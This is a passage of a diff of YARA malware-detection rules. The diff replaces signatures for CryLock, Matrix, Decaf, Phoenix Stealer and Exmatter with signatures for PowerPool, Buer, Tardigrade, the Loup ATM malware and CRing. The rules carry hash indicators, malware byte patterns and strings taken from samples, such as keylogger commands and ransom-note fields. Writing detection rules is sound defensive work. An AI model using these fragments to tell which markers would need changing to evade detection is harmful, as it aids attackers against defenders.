02 72 [1-4] 00 00 70 28 25 00 00 0a 0b 72 [1-4] 00 00 70 02 28 25 00 00 0a 28 1a 00 00 0a 06 6f 26 00 00 0a 07 7e 01 00 00 04 28 05 00 00 06 2c 06 06 6f 27 00 00 0a de 03 26 de 00 2a 00 00 01 10 00 00 00 00 1b 00 2b 46 00 03 13 00 00 01 } - $str2 = { 1b 30 05 00 1a 01 00 00 04 00 00 11 16 0a 73 28 00 00 0a 0b 07 6f 29 00 00 0a 1e 5b 8d 2c 00 00 01 0c 07 6f 2a 00 00 0a 1e 5b 8d 2c 00 00 01 0d 73 2b 00 00 0a 13 06 11 06 08 6f 2c 00 00 0a 11 06 09 6f 2c 00 00 0a de 0c 11 06 2c 07 11 06 6f 12 00 00 0a dc 08 8e 69 09 8e 69 58 8d 2c 00 00 01 13 04 08 11 04 08 8e 69 28 2d 00 00 0a 09 16 11 04 08 8e 69 09 8e 69 28 2e 00 00 0a 11 04 04 28 06 00 00 06 13 04 11 04 8e 69 28 2f 00 00 0a 13 05 07 08 09 6f 30 00 00 0a 13 07 02 19 73 31 00 00 0a 13 08 03 18 73 31 00 00 0a 13 09 11 09 11 07 17 73 32 00 00 0a 13 0a 11 09 11 05 16 11 05 8e 69 6f 33 00 00 0a 11 09 11 04 16 11 04 8e 69 6f 33 00 00 0a 11 08 11 0a 20 [4] 6f 34 00 00 0a de 30 11 0a 2c 07 11 0a 6f 12 00 00 0a dc 11 09 2c 07 11 09 6f 12 00 00 0a dc 11 08 2c 07 11 08 6f 12 00 00 0a dc 11 07 2c 07 11 07 6f 12 00 00 0a dc 17 0a de 0a 07 2c 06 07 6f 12 00 00 0a dc 06 2a 00 00 41 94 00 00 02 00 00 00 2b 00 00 00 12 00 00 00 3d 00 00 00 0c 00 00 00 00 00 00 00 02 00 00 00 ae 00 00 00 2c 00 00 00 da 00 00 00 0c 00 00 00 00 00 00 00 02 00 00 00 a2 00 00 00 44 00 00 00 e6 00 00 00 0c 00 00 00 00 00 00 00 02 00 00 00 99 00 00 00 59 00 00 00 f2 00 00 00 0c 00 00 00 00 00 00 00 02 00 00 00 90 00 00 00 6e 00 00 00 fe 00 00 00 0c 00 00 00 00 00 00 00 02 00 00 00 08 00 00 00 06 01 00 00 0e 01 00 00 0a 00 00 00 00 00 00 00 } - $str3 = { 1b 30 03 00 24 00 00 00 05 00 00 11 73 35 00 00 0a 0a 06 03 6f 36 00 00 0a 06 02 17 6f 37 00 00 0a 0b de 0a 06 2c 06 06 6f 12 00 00 0a dc 07 2a 01 10 00 00 02 00 06 00 12 18 00 0a 00 00 00 00 } + $s1 = { 5c 00 53 00 74 00 72 00 69 00 6e 00 67 00 46 00 69 00 6c 00 65 00 49 00 6e 00 66 00 6f 00 5c 00 25 00 30 00 34 00 78 00 25 00 30 00 34 00 78 00 5c 00 46 00 69 00 6c 00 65 00 44 00 65 00 73 00 63 00 72 00 69 00 70 00 74 00 69 00 6f 00 6e } + $s2 = "\\VarFileInfo\\Translation" fullword wide + $s3 = { 5c 00 46 00 69 00 6c 00 74 00 65 00 72 00 [2-8] 2e 00 6a 00 70 00 67 } + $s4 = "\\SetupUi" fullword wide + $s5 = { 25 00 73 00 7c 00 25 00 73 00 7c 00 25 00 73 00 7c 00 25 00 73 } + $s6 = { 47 00 6c 00 6f 00 62 00 61 00 6c 00 5c 00 25 00 73 00 25 00 64 } + $s7 = { 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 25 64 } + $s8 = { 45 00 72 00 61 00 20 00 75 00 70 00 6c 00 6f 00 61 00 64 00 3a 00 25 00 73 00 20 00 25 00 64 } + $s9 = "ExtKeyloggerStart" fullword ascii + $s10 = "ExtKeyloggerStop" fullword ascii + $s11 = "ExtServiceDelete" fullword ascii condition: - uint16(0)==0x5a4d and filesize >5KB and 2 of them + uint16(0)==0x5a4d and filesize >20KB and 8 of ($s*) } -rule ARKBIRD_SOLG_RAN_Crylock_Oct_2020_1 : FILE +rule ARKBIRD_SOLG_MAL_Powerpool_Jul_2021_1 : FILE { meta: - description = "Detect CryLock ransomware V2.0.0" + description = "Detect PowerPool malware" author = "Arkbird_SOLG" - id = "642211e0-b5fe-5842-ab16-ca1fc8d00ac0" - date = "2020-10-14" - modified = "2020-10-15" - reference = "https://twitter.com/JAMESWT_MHT/status/1316426560803680257" - source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-10-15/Crylock/RAN_CryLock_Oct_2020_1.yar#L1-L31" + id = "8248300e-fc3e-56df-be4a-f1850e2bedc8" + date = "2021-07-09" + modified = "2021-07-12" + reference = "https://securelist.com/iamtheking-and-the-slothfulmedia-malware-family/99000/" + source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-07-11/IAmTheKing/MAL_PowerPool_Jul_2021_1.yara#L1-L29" license_url = "N/A" - logic_hash = "5d9aae41283c5738f2e584ea8d236ae64f7615ec629f9513fddb611714ddc230" + logic_hash = "0978a6cd60533ffda0c2b13ea98dc1ba46a464890b895cb2704804a763756fca" score = 75 - quality = 71 + quality = 73 tags = "FILE" - hash1 = "04d8109c6c78055d772c01fefe1e5f48a70f2a65535cff17227b5a2c8506b831" + hash1 = "9c08136b26ee5234c61a5d9e5a17afb15da35efc66514d2df5b53178693644c5" + hash2 = "23e7e0bbc36d523daa8e3cd8e32618c6c1fb61e32f664756e77d7917b3b11644" + hash3 = "e30d32cc40ad19add7dfdcbed960d5f074ea632b796ae975b75eb25455b66bb0" + hash4 = "88e7813340194acc4b094fd48ecf665a12d19245b90f2a69dab5861982ca95f6" + tlp = "White" + adversary = "IAmTheKing" strings: - $s1 = "All commands sended to execution" fullword ascii - $s2 = "Processesblacklist1" fullword ascii - $s3 = "Execute all" fullword ascii - $s4 = "config.txt" fullword ascii - $debug1 = "Processed files: " fullword ascii - $debug2 = "Next -->" fullword ascii - $debug3 = "Status: scan network" fullword ascii - $debug4 = { 49 45 28 41 4c 28 22 25 73 22 2c 34 29 2c 22 41 4c 28 5c 22 25 30 3a 73 5c 22 2c 33 29 22 2c 22 4a 4b 28 5c 22 25 31 3a 73 5c 22 2c 5c 22 25 30 3a 73 5c 22 29 22 29 } - $debug5 = { 4a 75 6d 70 49 44 28 22 22 2c 22 25 73 22 29 } - $debug6 = { 45 6e 63 72 79 70 74 65 64 20 62 79 20 42 6c 61 63 6b 52 61 62 62 69 74 2e 20 28 [3-10] 29 } - $ran1 = "w_to_decrypt.hta" wide - $ran2 = "<%UNDECRYPT_DATETIME%>" fullword ascii - $ran3 = "<%START_DATETIME%>" fullword ascii - $ran4 = "<%MAIN_CONTACT%>" fullword ascii - $ran5 = "<%RESERVE_CONTACT%>" fullword ascii - $ran6 = "<%HID%>" fullword ascii + $s1 = "write info fail!!! GetLastError-->%u" fullword ascii + $s2 = "Set Option failed errcode: %ld" fullword ascii + $s3 = { 68 96 00 00 00 68 ?? c4 44 00 b9 ?? 4c 45 00 e8 [2] fb ff 68 [2] 44 00 e8 ?? 4f fe ff 59 c3 68 96 00 00 00 68 ?? c5 44 00 b9 ?? 4c 45 00 e8 [2] fb ff 68 [2] 44 00 e8 ?? 4f fe ff 59 c3 68 96 00 00 00 68 [2] 44 00 b9 ?? 4c 45 00 e8 [2] fb ff 68 [2] 44 00 e8 [2] fe ff 59 c3 83 3d ?? 4c 45 00 00 74 38 53 6a 01 b8 ?? 4c 45 00 e8 ?? a0 fc ff 50 6a 00 b9 ?? 4c 45 00 e8 [2] fb ff 6a ff bb 01 00 00 00 b8 ?? 4c 45 00 e8 [2] fc ff 40 50 b9 ?? 4c 45 00 e8 [2] fb ff 5b 33 c0 6a ff 50 68 ?? 4c 45 00 } + $s4 = { 2d 2d 25 73 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 25 73 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 25 73 22 } + $s5 = { 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 6d 75 6c 74 69 70 61 72 74 2f 66 6f 72 6d 2d 64 61 74 61 3b 20 62 6f 75 6e 64 61 72 79 3d 2d 2d 4d 55 4c 54 49 2d 50 41 52 54 53 2d 46 4f 52 4d 2d 44 41 54 41 2d 42 4f 55 4e 44 41 52 59 0d 0a } + $s6 = { 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 25 73 22 0d 0a 0d 0a } + $s7 = { 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 77 77 77 2d 66 6f 72 6d 2d 75 72 6c 65 6e 63 6f 64 65 64 0d 0a } + $s8 = { 25 73 3b 74 79 70 65 3d 25 73 3b 6c 65 6e 67 74 68 3d 25 73 3b 72 65 61 6c 64 61 74 61 3d 25 73 65 6e 64 } condition: - uint16(0)==0x5a4d and filesize >300KB and 3 of ($s*) and 4 of ($debug*) and 4 of ($ran*) + uint16(0)==0x5a4d and filesize >100KB and 6 of ($s*) } -rule ARKBIRD_SOLG_RAN_Matrix_Sep_2020_1 : FILE +rule ARKBIRD_SOLG_Loader_Buer_Nov_2020_1 : FILE { meta: - description = "Detect MATRIX ransomware" + description = "Detect Buer loader" author = "Arkbird_SOLG" - id = "a7df188c-e381-55e6-97e6-45f5830ff0d3" - date = "2020-10-15" - modified = "2020-10-15" - reference = "Internal Research" - source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-10-15/MATRIX/RAN_Matrix_Sep_2020_1.yar#L1-L28" + id = "a2883eca-d576-53ba-aa97-5e3c94f501a5" + date = "2020-12-01" + modified = "2020-12-01" + reference = "https://twitter.com/James_inthe_box/status/1333551419735953409" + source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-12-01/Buer/Mal_Buer_Nov_2020_1.yar#L35-L64" license_url = "N/A" - logic_hash = "e832b258e8d2ee94ebbf2e715ca01960a92d723ee017261b18ce05d3095bf8a3" + logic_hash = "96a74b497076be170ce6138189501d8b3a1002bcf07f9d3cf662d64612d04a59" score = 75 - quality = 75 + quality = 55 tags = "FILE" - hash1 = "7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf" - hash2 = "afca3b84177133ff859d9b9d620b582d913218723bfcf83d119ec125b88a8c40" - hash3 = "d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829" - hash4 = "5474b58de90ad79d6df4c633fb773053fecc16ad69fb5b86e7a2b640a2a056d6" - - strings: - $debug1 = "[LDRIVES]: not found!" fullword wide - $debug2 = "[DONE]: NO_SHARES!" fullword wide - $debug3 = "[ALL_LOCAL_KID]: " fullword wide - $debug4 = "[FINISHED]: G=" fullword wide - $debug5 = "[FEX_START]" fullword wide - $debug6 = "[LOGSAVED]" fullword wide - $debug7 = "[GENKEY]" fullword wide - $debug8 = "[SHARES]" fullword wide - $debug9 = "[SHARESSCAN]: " fullword wide - $reg1 = { 2e 00 70 00 68 00 70 00 3f 00 61 00 70 00 69 00 6b 00 65 00 79 00 3d } - $reg2 = { 26 00 63 00 6f 00 6d 00 70 00 75 00 73 00 65 00 72 00 3d } - $reg3 = { 26 00 73 00 69 00 64 00 3d 00 } - $reg4 = { 26 00 70 00 68 00 61 00 73 00 65 00 3d } - $reg5 = { 47 00 45 00 54 } + hash1 = "2824d4b0e5a502416696b189bd840870a19dfd555b53535f20b0c87c95f4c232" + hash2 = "a98abbce5e84c4c3b67b7af3f9b4dc9704b5af33b6183fb3c192e26b1e0ca005" + hash3 = "ae3ac27e8303519cf04a053a424a0939ecc3905a9a62f33bae3a29f069251b1f" + + strings: + $s1 = "bcdfghklmnpqrstvwxz" fullword ascii + $s2 = "%02x" fullword wide + $s3 = "{%s-%d-%d}" fullword wide + $s4 = "update" fullword wide + $s5 = "]otju}y&Ykx|kx&867?5Ykx|kx&867<" fullword ascii + $s6 = "]otju}y&Ykx|kx&8678&X8" fullword ascii + $s7 = "]otju}y&\\oyzg5Ykx|kx&857>" fullword ascii + $s8 = "]otju}y&>47" fullword ascii + $s9 = "]otju}y&Ykx|kx&8678" fullword ascii + $s10 = "]otju}y&=" fullword ascii + $s11 = "Iutzktz3Z" fullword ascii + $s12 = "g|mnuuq~4jrr" fullword ascii + $s13 = "RegularModules" fullword ascii + $s14 = "]otju}y&>" fullword ascii condition: - uint16(0)==0x5a4d and filesize >500KB and 4 of ($debug*) and 3 of ($reg*) + uint16(0)==0x5a4d and filesize >10KB and 8 of them } -rule ARKBIRD_SOLG_RAN_Decaf_Nov_2021_1 : FILE +rule ARKBIRD_SOLG_APT_Tardigrade_Nov_2021_1 : FILE { meta: - description = "Detect Decaf ransomware (unpacked UPX)" + description = "Detect Tardigrade loader" author = "Arkbird_SOLG" - id = "d19b2d31-a6c5-5033-ba43-4e9ccabc37bb" - date = "2021-11-01" - modified = "2021-11-02" - reference = "https://blog.morphisec.com/decaf-ransomware-a-new-golang-threat-makes-its-appearance" - source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-11-01/Decaf/RAN_Decaf_Nov_2021_1.yara#L1-L19" + id = "f6c8014a-21dd-5ebd-9edd-7a9f649a43a0" + date = "2021-11-22" + modified = "2021-11-23" + reference = "https://www.isac.bio/post/tardigrade" + source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-11-22/APT_Tardigrade_Nov_2021_1.yara#L1-L19" license_url = "N/A" - logic_hash = "5cea33d710d252b39bcd8ae227f52d10897b7fe58b1ff5226a1cb8cc094d600c" + logic_hash = "98358d9dbf62e653b136268d8694ed4d7f48c80125dd12ccea5f36ff5c6b4a3c" score = 75 quality = 75 tags = "FILE" - hash1 = "088b4715bbe986deac972d551b88f178d43b191f5a71fbd4db3fb0810a233500" - hash2 = "5da2a2ebe9959e6ac21683a8950055309eb34544962c02ed564e0deaf83c9477" + hash1 = "1c7c1a28921d81f672320e81ad58642ef3b8e27abf8a8e51400b98b40f49568be" + hash2 = "c0976a1fbc3dd938f1d2996a888d0b3a516b432a2c38d788831553d81e2f5858" + hash3 = "cf88926b7d5a5ebbd563d0241aaf83718b77cec56da66bdf234295cc5a91c5fe" tlp = "white" - adversary = "-" + adversary = "Tardigrade" strings: - $s1 = { 48 8b 05 [3] 00 48 8b 0d [3] 00 48 8d 54 24 ?? 8b 5c 24 ?? 48 8d 74 24 ?? 48 89 0c 24 48 89 44 24 08 48 89 54 24 10 48 89 5c 24 18 48 89 74 24 20 89 f8 48 89 44 24 28 48 c7 44 24 30 00 00 00 00 e8 [2] 00 00 45 0f 57 ff 65 4c 8b 34 25 28 00 00 00 4d 8b b6 00 00 00 00 48 83 7c 24 38 00 74 ?? 48 8b 54 24 ?? c6 82 e5 00 00 00 00 48 8b 54 24 ?? 31 c0 } - $s2 = { 48 8b 05 [3] 00 48 8b 0d [3] 00 48 89 0c 24 48 89 44 24 08 44 0f 11 7c 24 10 48 c7 44 24 20 00 00 00 00 e8 [2] 00 00 45 0f 57 ff 65 4c 8b 34 25 28 00 00 00 4d 8b b6 00 00 00 00 48 83 7c 24 28 00 74 0a 48 8b 6c 24 ?? 48 83 c4 ?? c3 e8 [3] 00 45 0f 57 ff 65 4c 8b 34 25 28 00 00 00 4d 8b b6 00 00 00 00 } - $s3 = { 48 83 ec 48 48 89 6c 24 40 48 8d 6c 24 40 48 89 44 24 50 48 89 5c 24 58 48 83 3d [3] 00 00 75 73 48 8b 05 45 [2] 00 48 8d 0d 66 [2] 00 48 89 04 24 48 89 4c 24 08 48 c7 44 24 10 04 01 00 00 e8 [2] 00 00 45 0f 57 ff 65 4c 8b 34 25 28 00 00 00 4d 8b b6 00 00 00 00 48 8b 44 24 18 48 85 c0 0f 84 6a 01 00 00 48 3d 04 01 00 00 0f 87 5e 01 00 00 48 8d 1d 1a [2] 00 c6 04 03 5c 4c 8d 40 01 4c 89 05 [3] 00 48 8b 44 24 50 48 8b 5c } - $s4 = { 48 89 44 24 40 c7 44 24 3c 00 00 00 00 48 8b 0d [3] 00 48 8d 54 24 3c 48 89 0c 24 48 89 44 24 08 48 89 54 24 10 e8 [2] 00 00 45 0f 57 ff 65 4c 8b 34 25 28 00 00 00 4d 8b b6 00 00 00 00 48 83 7c 24 18 00 75 10 48 8b 44 24 40 8b 4c 24 68 48 8b 5c 24 60 eb 1d 48 8b 44 24 40 48 8b 5c 24 60 8b 4c 24 68 e8 8f 00 00 00 48 8b 6c 24 48 48 83 c4 50 c3 c7 44 24 38 00 00 00 00 48 8b 15 [3] 00 48 8d 74 24 38 48 89 14 24 48 89 44 24 08 48 89 5c 24 10 48 63 c1 48 89 44 24 18 48 89 74 24 20 48 c7 44 24 28 00 00 00 00 e8 } - $s5 = { 2d 2d 2d 2d 2d 42 45 47 49 4e 20 52 53 41 20 50 55 42 4c 49 43 20 4b 45 59 2d 2d 2d 2d 2d 0a 4d 49 49 42 43 67 4b 43 41 51 45 41 } + $s1 = { 63 6d 64 2e 65 78 65 20 2f 63 20 65 63 68 6f 20 [10-40] 3e 22 25 73 22 26 65 78 69 74 } + $s2 = { 4c 89 44 24 38 89 54 24 34 48 89 4c 24 28 e8 [2] 01 00 e8 [2] 01 00 4c 8b 44 24 38 8b 54 24 34 48 8b 4c 24 28 48 83 c4 48 e9 71 fe ff ff 90 48 89 ca 48 8d 0d 76 ?? 02 00 } + $s3 = { 41 57 41 56 41 55 41 54 55 57 56 53 48 ?? ec [1-4] 48 8b 84 24 ?? 00 00 00 48 89 44 24 60 48 8b 05 [2] 01 00 48 89 4c 24 40 ?? 38 } + $s4 = { 45 31 c0 48 8d 8c 24 ?? 02 00 00 4c 8d 8c 24 ?? 01 00 00 48 8d 15 [2] 01 00 ff 15 [2] 02 00 } condition: - uint16(0)==0x5a4d and filesize >400KB and 4 of them + uint16(0)==0x5a4d and filesize >50KB and all of them } -rule ARKBIRD_SOLG_MAL_Phoenix_Stealer_Jun_2021_1 : FILE +import "pe" + +rule ARKBIRD_SOLG_Mal_ATM_Loup_Aug_2020_1 : FILE { meta: - description = "Detect the Phoenix Stealer" + description = "Detect ATM malware Loup by theirs strings." author = "Arkbird_SOLG" - id = "8c9df216-cbfe-51f3-a6d7-cfeb99fafbe0" - date = "2021-11-01" - modified = "2021-11-01" - reference = "https://twitter.com/3xp0rtblog/status/1455111070566207493/" - source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-11-01/Phoenix_Stealer/MAL_Phoenix_Stealer_Jun_2021_1.yara#L1-L20" + id = "07c0fe02-a82a-58a7-8776-748a1c986f93" + date = "2020-08-17" + modified = "2020-08-18" + reference = "https://twitter.com/r3c0nst/status/1295275546780327936" + source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-08-17/Loup/Mal_ATM_Loup_Aug_2020_1.yar#L3-L34" license_url = "N/A" - logic_hash = "989c2518a42201559265ce4b974b35df5c4b8365e53f789fc124ee969e747c87" + logic_hash = "18e4d6af5d89746b42c87d7311e442f61deff3bfcbf57cc008d87290e91baafb" score = 75 - quality = 75 + quality = 67 tags = "FILE" - hash1 = "5bbfeee67b9b087ed228eccdacd4a7e71d40f7f96ad869903e02d9c3b02adbe5" - hash2 = "34f78f4028c51f6340c1f4846b65252fa6686ba0a5ab8ebc35c737a8960ba43e" - hash3 = "e51de8c43034fafaa49f81e9cc955c0cf60dc9684f28d8c355baf0724710de1f" - tlp = "White" - adversary = "-" + hash1 = "6c9e9f78963ab3e7acb43826906af22571250dc025f9e7116e0201b805dc1196" strings: - $s1 = { 6a 16 58 0f be c8 88 85 b0 fe ff ff c7 85 d8 fe ff ff 42 73 7a 73 c7 85 dc fe ff ff 71 64 77 7b c7 85 e0 fe ff ff 38 73 6e 73 c6 85 e4 fe ff ff 00 e8 aa 73 ff ff 89 85 94 } - $s2 = "UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s" ascii - $s3 = { b8 c9 11 47 00 e8 c3 c5 01 00 68 f8 d7 47 00 33 db 53 53 ff 15 cc 20 47 00 53 50 89 85 d0 fc ff ff ff 15 d0 20 47 00 85 c0 0f 85 92 02 00 00 6a 01 ff 15 8c 22 47 00 84 c0 79 f4 53 e8 e2 aa 00 00 50 e8 1e 98 00 00 8b 35 84 22 47 00 8d 85 ec fe ff ff 59 59 50 53 53 6a 1c 53 ff d6 8d 8d ec fe ff ff 8d 51 01 8a 01 41 84 c0 75 f9 2b ca 8d 85 ec fe ff ff 51 50 b9 f0 5b 48 00 e8 bf 0e 00 00 8d 85 e8 fd ff ff 50 68 04 01 00 00 ff 15 40 20 47 00 8d 8d e8 fd ff ff 8d 51 01 8a 01 41 84 c0 75 f9 2b ca 8d 85 e8 fd ff ff 51 50 b9 08 5c 48 00 e8 89 0e 00 00 8d 85 e4 fc ff ff 50 53 53 6a 1a 53 ff d6 8d 8d e4 fc ff ff 8d 51 01 8a 01 41 84 c0 75 f9 2b ca 8d 85 e4 fc ff ff 51 50 b9 90 5b 48 00 e8 57 0e 00 00 8b fb 89 9d dc fc ff ff 8b f3 89 bd d4 fc ff ff 89 b5 d8 fc ff ff 83 65 fc 00 33 c9 6a 16 5a 41 e8 71 05 ff ff 8b cf 89 85 e0 fc } - $s4 = { 6a 01 ff 15 98 22 47 00 85 c0 74 5d 6a 00 ff 15 a0 22 47 00 85 c0 74 51 56 6a 01 ff 15 94 22 47 00 8b f0 85 f6 74 3b 56 ff 15 38 21 47 00 8b d0 85 d2 74 27 8b ca 57 8d 79 01 8a 01 41 84 c0 75 f9 2b cf 6a 03 51 8b 0d 6c 72 48 00 52 ba 58 d7 47 00 e8 95 1b fe ff 83 c4 0c 5f 56 ff 15 64 21 47 00 } - $s5 = { 81 ec 14 02 00 00 a1 0c 50 48 00 33 c5 89 45 fc 53 56 8b d9 be 19 27 00 00 57 8b 7d 0c 83 fb ff 75 0c e8 bb eb ff ff 89 37 89 47 04 eb 17 ff 75 08 52 53 ff 15 bc 22 47 00 85 c0 8b cf 0f 95 c2 e8 b8 fe ff ff e8 98 eb ff ff 8b 4f 04 8b 49 04 3b 48 04 75 08 81 3f 34 27 00 00 74 20 e8 80 eb ff ff 8b 4f 04 8b 49 04 3b 48 04 0f 85 b9 00 00 00 81 3f 33 27 00 00 0f 85 ad 00 00 00 83 fb ff 75 0c e8 5b eb ff ff 89 37 e9 99 00 00 00 33 c0 89 9d f8 fd ff ff 40 89 9d fc fe ff ff 89 85 f4 fd ff ff 89 85 f8 fe ff ff 8d 85 f8 fe ff ff 6a 00 50 8d 85 f4 fd ff ff 50 6a 00 8d 43 01 50 ff 15 d8 22 47 00 8b f0 8b cf 85 f6 0f 98 c2 e8 2a fe ff ff 85 f6 78 53 83 a5 f0 fd ff ff 00 8d 85 ec fd ff ff 50 8d 85 f0 fd ff ff c7 85 ec fd ff ff 04 00 00 00 50 68 07 10 00 00 68 ff ff 00 00 53 ff 15 b0 22 47 00 8b f0 8b cf 85 f6 0f 95 c2 e8 e8 fd ff } + $pdb1 = "C:\\Users\\muham\\source\\repos\\loup\\Debug\\loup.pdb" fullword ascii + $pdb2 = "PDBOpenValidate5" fullword ascii + $dbg1 = "Run-Time Check Failure #%d - %s" fullword ascii + $dbg2 = "Unknown Filename" fullword ascii + $dbg3 = "Unknown Module Name" fullword ascii + $info1 = "%s%s%p%s%zd%s%d%s%s%s%s%s" fullword ascii + $info2 = { 41 64 64 72 65 73 73 3a 20 30 78 } + $info3 = { 53 69 7a 65 3a } + $info4 = { 44 61 74 61 3a } + $s1 = "MSXFS.dll" fullword ascii + $s2 = "WFSExecute" fullword ascii + $s3 = "WfsVersion" fullword ascii + $s4 = "SvcVersion" fullword ascii + $s5 = "SpiVersion" fullword ascii + $s6 = "CurrencyDispenser1" fullword ascii + $s7 = "WFSUnlock" fullword ascii + $s8 = "WFSFreeResult" fullword ascii + $s9 = "WFSCleanUp" fullword ascii + $s10 = "WFSOpen" fullword ascii + $s11 = "WFSClose" fullword ascii + $s12 = "WFSStartUp" fullword ascii condition: - uint16(0)==0x5a4d and filesize >80KB and 4 of ($s*) + uint16(0)==0x5a4d and filesize <20KB and (pe.imphash()=="190fc01f66c40478aa91be89a98c57e9" and (1 of ($pdb*) and 2 of ($dbg*) and 2 of ($info*) and 9 of ($s*))) } -rule ARKBIRD_SOLG_EXF_Exmatter_Nov_2021_1 : FILE +rule ARKBIRD_SOLG_RAN_Cring_Apr_2021_1 : FILE { meta: - description = "Detect packed Exmatter with Confuser" + description = "Detect CRing ransomware" author = "Arkbird_SOLG" - id = "ddae7776-3202-50e6-b8af-0e5d15373386" - date = "2021-11-01" - modified = "2021-11-01" - reference = "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/blackmatter-data-exfiltration" - source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-11-01/Exmatter/EXF_Exmatter_Nov_2021_1.yara#L1-L22" + id = "3648494d-8c27-5767-90e8-45e294aac382" + date = "2021-04-08" + modified = "2021-04-09" + reference = "Internal Research" + source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-04-08/CRing/RAN_CRing_Apr_2021_1.yara#L1-L19" license_url = "N/A" - logic_hash = "67aaac3db488a9e28897047a7498b7a447ec63cdb6da82cb3d4217c7d615f176" + logic_hash = "d82db146c9048391d79bda6cc5913363fc3cfc1a7cca26b23b362b7f3563ef3c" score = 50 quality = 75 tags = "FILE" - hash1 = "b6bc126526e27c98a94aab16989864161db1b3a75f18bd5c72bacbdfccad7bd7" - hash2 = "8eded48c166f50be5ac33be4b010b09f911ffc155a3ab76821e4febd369d17ef" - hash3 = "325ecd90ce19dd8d184ffe7dfb01b0dd02a77e9eabcb587f3738bcfbd3f832a1" + hash1 = "274ef2fba8ba46187f9cf462a02de286ea23ec75d163af01088f6856944817eb" + hash2 = "f7d270ca0f2b4d21830787431f881cd004b2eb102cc3048c6b4d69cb775511c8" + hash3 = "ebb528207b2fc06a6bc89e9d430bcdfe254f0838b0f4660f67cc6bd1ebc193be" level = "Experimental" - tlp = "white" - adversary = "RaaS" strings: - $s1 = { 45 38 42 44 32 35 45 33 46 35 33 34 39 39 41 43 31 39 42 44 42 34 31 45 37 36 45 38 36 38 39 37 38 39 31 31 42 43 35 41 44 46 37 36 34 33 31 38 33 45 34 38 36 33 38 32 42 44 33 42 42 44 30 30 00 35 41 41 34 30 37 35 37 33 42 34 43 36 45 43 43 41 45 35 36 44 30 46 35 43 34 33 35 34 36 32 33 39 38 43 30 41 46 42 35 33 46 36 44 36 32 33 31 44 38 39 34 44 34 44 31 41 37 46 44 36 45 30 30 00 42 33 39 46 43 34 39 41 36 31 35 36 45 37 31 35 45 38 42 39 37 41 35 30 46 44 34 35 46 45 34 36 38 37 30 37 38 44 42 44 31 45 45 43 46 46 44 39 46 38 35 31 34 30 42 35 33 31 36 45 39 32 31 30 00 44 33 30 39 45 32 43 32 30 31 43 37 35 43 43 30 38 43 35 33 36 42 41 34 30 32 31 45 41 35 37 43 45 42 34 44 30 34 34 39 32 36 30 31 36 46 46 39 39 46 45 44 45 36 31 35 34 36 31 30 41 32 31 30 00 36 43 37 35 38 36 33 43 32 46 39 38 44 37 46 41 45 33 36 45 37 44 46 43 45 38 46 31 39 45 43 39 35 41 46 30 30 43 43 42 33 44 43 39 39 39 31 38 46 42 38 43 30 42 35 38 39 42 30 42 34 35 31 30 } - $s2 = { 33 44 33 32 31 41 45 42 34 33 39 35 36 30 34 38 46 35 43 37 35 41 38 42 38 36 36 35 32 34 33 34 44 31 33 31 30 31 31 32 45 37 44 36 42 37 38 46 42 37 35 44 39 33 35 36 31 44 31 31 30 39 38 31 00 34 39 44 38 32 36 38 33 30 42 35 44 39 32 30 34 34 38 46 37 34 42 42 42 45 44 42 33 36 31 46 31 37 43 39 44 44 34 36 31 45 30 44 43 33 44 45 44 31 31 34 45 36 45 31 33 45 30 31 37 33 39 38 31 00 31 45 42 30 38 30 36 38 33 30 39 37 41 32 37 46 42 37 34 33 46 36 32 44 30 38 33 38 44 34 42 41 36 34 33 35 46 44 43 33 38 38 32 41 36 41 36 37 45 46 42 43 32 32 34 45 37 31 42 44 42 43 38 31 00 46 39 45 39 31 44 44 39 44 32 36 32 38 43 43 32 39 32 42 41 43 32 36 35 39 41 35 35 34 34 42 38 42 46 42 30 41 44 31 46 38 31 30 30 43 37 35 45 38 32 44 44 33 42 32 43 45 44 30 35 43 37 39 31 00 45 44 44 31 45 32 34 31 37 36 33 46 34 33 33 35 30 38 37 42 39 38 41 44 30 37 35 38 44 36 39 33 31 39 32 42 37 37 45 44 37 32 41 39 36 43 38 42 33 35 41 45 31 39 34 41 45 38 45 39 31 41 39 31 00 38 43 46 31 34 42 43 33 42 46 39 44 36 31 30 30 43 41 38 41 } - $s3 = "SSH_MSG_NEWKEYS" ascii - $s4 = { 35 45 46 32 31 35 39 31 38 33 32 30 41 44 38 41 46 41 41 30 32 35 33 35 35 34 36 46 34 34 33 43 38 44 30 39 46 30 41 44 35 31 33 37 45 35 32 30 33 34 32 38 38 43 37 36 39 41 43 36 42 41 44 46 00 44 36 